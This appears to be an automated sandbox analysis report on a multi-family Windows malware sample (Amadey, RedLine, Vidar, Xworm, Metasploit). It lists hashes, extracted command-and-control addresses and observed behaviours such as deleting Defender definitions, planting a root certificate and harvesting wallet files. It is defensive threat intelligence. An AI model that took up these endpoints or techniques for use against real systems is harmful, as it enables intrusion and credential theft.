amadey | 7db7d06dc769693ddfc84db1cefd6b32f432bc2c72144c3d8358820d29e273a7

Analysis

max time kernel
163s
max time network
1796s
platform
windows10-1703_x64
resource
win10-20231220-es
resource tags

arch:x64arch:x86image:win10-20231220-eslocale:es-esos:windows10-1703-x64systemwindows
submitted
26-12-2023 02:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

amadey metasploit parallax redline vidar xworm 1827 @ssmvw2 backdoor discovery evasion infostealer rat spyware stealer trojan

Malware Config

Extracted

Family

redline

Botnet

@ssmvw2

45.15.156.167:80

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/shell_reverse_tcp

127.0.0.1:12346

Extracted

Family

vidar

Version

55.7

Botnet

1827

https://t.me/deadftx

https://www.ultimate-guitar.com/u/smbfupkuhrgc1

http://116.202.2.1:80

Attributes

profile_id
1827

Extracted

Family

metasploit

Version

windows/reverse_tcp

193.117.208.148:7800

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

Processes:

MpCmdRun.exe

pid	Process
6188	MpCmdRun.exe

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/files/0x000700000001ad36-12074.dat	family_xworm
behavioral2/files/0x000700000001ad3d-13071.dat	family_xworm

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
ParallaxRat
ParallaxRat is a multipurpose RAT written in MASM.
rat parallax

ParallaxRat payload 19 IoCs

Detects payload of Parallax Rat, a small portable Rat usually digitally signed with a Sectigo certificate.

Processes:

resource	yara_rule
behavioral2/memory/3536-178-0x0000000000400000-0x000000000042C000-memory.dmp	parallax_rat
behavioral2/memory/3536-182-0x0000000000400000-0x000000000042C000-memory.dmp	parallax_rat
behavioral2/memory/3536-188-0x0000000000400000-0x000000000042C000-memory.dmp	parallax_rat
behavioral2/memory/3536-197-0x0000000000400000-0x000000000042C000-memory.dmp	parallax_rat
behavioral2/memory/3536-198-0x0000000000400000-0x000000000042C000-memory.dmp	parallax_rat
behavioral2/memory/3536-196-0x0000000000400000-0x000000000042C000-memory.dmp	parallax_rat
behavioral2/memory/3536-195-0x0000000000400000-0x000000000042C000-memory.dmp	parallax_rat
behavioral2/memory/3536-194-0x0000000000400000-0x000000000042C000-memory.dmp	parallax_rat
behavioral2/memory/3536-193-0x0000000000400000-0x000000000042C000-memory.dmp	parallax_rat
behavioral2/memory/3536-192-0x0000000000400000-0x000000000042C000-memory.dmp	parallax_rat
behavioral2/memory/3536-191-0x0000000000400000-0x000000000042C000-memory.dmp	parallax_rat
behavioral2/memory/3536-190-0x0000000000400000-0x000000000042C000-memory.dmp	parallax_rat
behavioral2/memory/3536-189-0x0000000000400000-0x000000000042C000-memory.dmp	parallax_rat
behavioral2/memory/3536-187-0x0000000000400000-0x000000000042C000-memory.dmp	parallax_rat
behavioral2/memory/3536-186-0x0000000000400000-0x000000000042C000-memory.dmp	parallax_rat
behavioral2/memory/3536-185-0x0000000000400000-0x000000000042C000-memory.dmp	parallax_rat
behavioral2/memory/3536-184-0x0000000000400000-0x000000000042C000-memory.dmp	parallax_rat
behavioral2/memory/3536-183-0x0000000000400000-0x000000000042C000-memory.dmp	parallax_rat
behavioral2/memory/3536-209-0x0000000000400000-0x000000000042C000-memory.dmp	parallax_rat

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/668-261-0x0000000000400000-0x000000000043C000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

nxmr.exewupgrdsv.exepinguin.exe

description	pid	Process	procid_target
PID 4772 created 3388	4772	nxmr.exe	30
PID 4772 created 3388	4772	nxmr.exe	30
PID 1340 created 3388	1340	wupgrdsv.exe	30
PID 208 created 4748	208	pinguin.exe	14

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Downloads MZ/PE file

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Processes:

netsh.exe

pid	Process
3156	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

.NET Reactor proctector 3 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral2/memory/2232-412-0x0000000002AC0000-0x0000000002B10000-memory.dmp	net_reactor
behavioral2/memory/2232-414-0x0000000002AC0000-0x0000000002B0C000-memory.dmp	net_reactor
behavioral2/memory/2232-410-0x0000000002900000-0x0000000002954000-memory.dmp	net_reactor

Drops startup file 2 IoCs

Processes:

DllHost.exe

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\retero.exe	DllHost.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\retero.exe	DllHost.exe

Executes dropped EXE 25 IoCs

Processes:

tuc7.exetuc7.tmpdbviewer.exedbviewer.exehtml.exe4iBpiQUavIMb.exeUpdateCheck.exesetup294.exeTat tow roc koyor manax wodebib haninew dolixo.exeWScript.execs_maltest.exebuild.exetuc5.exetuc5.tmptuc4.exetuc4.tmpbuild_2023-12-19_21-29.exenxmr.exeScreensaver.exewupgrdsv.exepinguin.exeWerFault.execp.exebc_memories_from_the_mcp.exeXRJNZC.exe

pid	Process
3652	tuc7.exe
2168	tuc7.tmp
3160	dbviewer.exe
4984	dbviewer.exe
2064	html.exe
2924	4iBpiQUavIMb.exe
4504	UpdateCheck.exe
4668	setup294.exe
2416	Tat tow roc koyor manax wodebib haninew dolixo.exe
1552	WScript.exe
2936	cs_maltest.exe
2304	build.exe
3792	tuc5.exe
784	tuc5.tmp
3116	tuc4.exe
4268	tuc4.tmp
2232	build_2023-12-19_21-29.exe
4772	nxmr.exe
3772	Screensaver.exe
1340	wupgrdsv.exe
208	pinguin.exe
196	WerFault.exe
4876	cp.exe
3560	bc_memories_from_the_mcp.exe
5076	XRJNZC.exe

Loads dropped DLL 12 IoCs

Processes:

tuc7.tmppowershell.exetuc5.tmptuc4.tmpWerFault.exeConhost.exe

pid	Process
2168	tuc7.tmp
2168	tuc7.tmp
2168	tuc7.tmp
2368	powershell.exe
784	tuc5.tmp
784	tuc5.tmp
784	tuc5.tmp
4268	tuc4.tmp
4268	tuc4.tmp
4268	tuc4.tmp
196	WerFault.exe
4456	Conhost.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exe

pid	Process
3112	icacls.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
158	ipinfo.io
160	ipinfo.io
176	api.ipify.org
177	api.ipify.org

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral2/files/0x000a00000001abf6-2876.dat	autoit_exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

WScript.exeTat tow roc koyor manax wodebib haninew dolixo.exeWerFault.exe

description	pid	Process	procid_target
PID 1552 set thread context of 668	1552	WScript.exe	100
PID 2416 set thread context of 2916	2416	Tat tow roc koyor manax wodebib haninew dolixo.exe	108
PID 196 set thread context of 2276	196	WerFault.exe	124

Drops file in Program Files directory 64 IoCs

Processes:

tuc7.tmptuc4.tmptuc5.tmp

description	ioc	Process
File created	C:\Program Files (x86)\DBViewerAPI\is-S6ILM.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-LD3UB.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-55075.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-9D1FU.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-MF2BG.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-41N8O.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\is-HS6HO.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\unins000.dat	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-O1OF8.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-4U2GG.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-DN7G8.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\plugins\internal\is-O81RD.tmp	tuc7.tmp
File opened for modification	C:\Program Files (x86)\DBViewerAPI\unins000.dat	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\is-J4KA7.tmp	tuc4.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-0CE2I.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-N1F25.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-8JN91.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-QGQDK.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-U6CDF.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-FN1I2.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-5LFFJ.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\stuff\is-E4GD2.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-QPML8.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-8JPIA.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-UEJTH.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-6BDSL.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-J6F0O.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-DG0H2.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-V61SE.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-2V8BR.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-8K8EN.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-QR5I4.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-TQS4K.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-JP5C3.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-E04BA.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-LGASF.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-KS3M9.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\plugins\internal\is-IKN2E.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\is-5E1V5.tmp	tuc5.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-DM16E.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-2GC3O.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-7S92N.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-RACHV.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-NKH9C.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-R37NU.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\stuff\is-C36A6.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-317R2.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-OELOP.tmp	tuc4.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-8SQ0P.tmp	tuc4.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-CVDRJ.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-8QTSS.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\lessmsi\is-9R568.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\stuff\is-DRKQD.tmp	tuc7.tmp
File opened for modification	C:\Program Files (x86)\DBViewerAPI\dbviewer.exe	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-QNPMP.tmp	tuc5.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-SFCJS.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-JMDV0.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-JE4L2.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-DD0PM.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-UG2OC.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-DQE1J.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-J3COF.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\bin\x86\is-BRM28.tmp	tuc7.tmp
File created	C:\Program Files (x86)\DBViewerAPI\stuff\is-CNP76.tmp	tuc7.tmp

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid	Process
3708	sc.exe
2864	sc.exe
5528	sc.exe
5596	sc.exe
2456	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 6 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
196	2856	WerFault.exe	172
6088	2508	WerFault.exe	194
5744	4172	WerFault.exe	248
5940	5856	WerFault.exe	254
5376	5200	WerFault.exe	258
6240	3024	WerFault.exe	308

Creates scheduled task(s) 1 TTPs 11 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
6520	schtasks.exe
6256	schtasks.exe
3404	schtasks.exe
2428	schtasks.exe
3820	schtasks.exe
5180	schtasks.exe
4884	schtasks.exe
6156	schtasks.exe
2452	schtasks.exe
3068	schtasks.exe
516	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

Processes:

timeout.exetimeout.exe

pid	Process
1372	timeout.exe
3456	timeout.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

Processes:

tasklist.exetasklist.exe

pid	Process
2932	tasklist.exe
5808	tasklist.exe

Modifies registry class 1 IoCs

Processes:

setup294.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3934047325-4097474570-3437169968-1000_Classes\Local Settings	setup294.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

4363463463464363463463463.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d60168000000010000000800000000409120d035d901030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1368000000010000000800000000409120d035d9017e000000010000000800000000c001b39667d6017f000000010000000e000000300c060a2b0601040182370a03041d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589100b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000006200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd6770739090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d60168000000010000000800000000409120d035d901030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 5c0000000100000004000000000800001900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1368000000010000000800000000409120d035d9017e000000010000000800000000c001b39667d6017f000000010000000e000000300c060a2b0601040182370a03041d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589100b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000006200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd6770739090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d040000000100000010000000410352dc0ff7501b16f0028eba6f45c520000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	4363463463464363463463463.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
2264	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

html.exe4iBpiQUavIMb.exeTat tow roc koyor manax wodebib haninew dolixo.exe

pid	Process
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2064	html.exe
2924	4iBpiQUavIMb.exe
2924	4iBpiQUavIMb.exe
2924	4iBpiQUavIMb.exe
2924	4iBpiQUavIMb.exe
